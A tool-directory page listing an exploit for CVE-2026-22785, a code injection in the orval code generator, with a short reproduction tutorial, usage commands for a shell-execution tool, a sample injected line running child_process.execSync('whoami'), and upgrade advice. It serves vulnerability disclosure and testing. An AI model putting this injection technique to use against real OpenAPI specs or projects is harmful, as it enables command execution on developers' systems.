Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/langbyyi/cve-2026-22785
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationLearning & Education
GitHublangbyyi/cve-2026-22785

CVE-2026-22785

Exploit tool for CVE-2026-22785, a critical code injection in orval < 7.18.0. Provides shell command execution and file scanning to demonstrate the vulnerability and verify payload injection.

View Repository
1128 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-22785 Reproduction Tutorial

Vulnerability Overview

  • CVE: CVE-2026-22785
  • Impact: orval < 7.18.0
  • Fix: orval >= 7.18.0
  • CVSS: 9.3 CRITICAL
  • Type: Code Injection

Vulnerability Principle

orval < 7.18.0 directly concatenates the summary field from the OpenAPI specification into the template when generating MCP server code, without escaping it, leading to code injection.

Reproduction Steps

1. Environment Preparation

cd exploit
npm install

2. Using the Tool

# Execute command (exploit)
python cve_tool.py shell <command>

# Example
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir

# Scan files
python cve_tool.py scan <file>

3. Output Description

<command output>
[+] CVE-2026-22785: Payload injection successful
[+] Injection location: server.ts:31

Vulnerability Evidence

server.ts generated code:

server.tool(
  'getApiDemo',
  'API.' + require('child_process').execSync('whoami', {}),//',
  getApiDemoHandler
);

Defense Recommendations

  1. Upgrade orval to >= 7.18.0
  2. Validate the source of the OpenAPI specification
  3. Review the generated code
Download Tool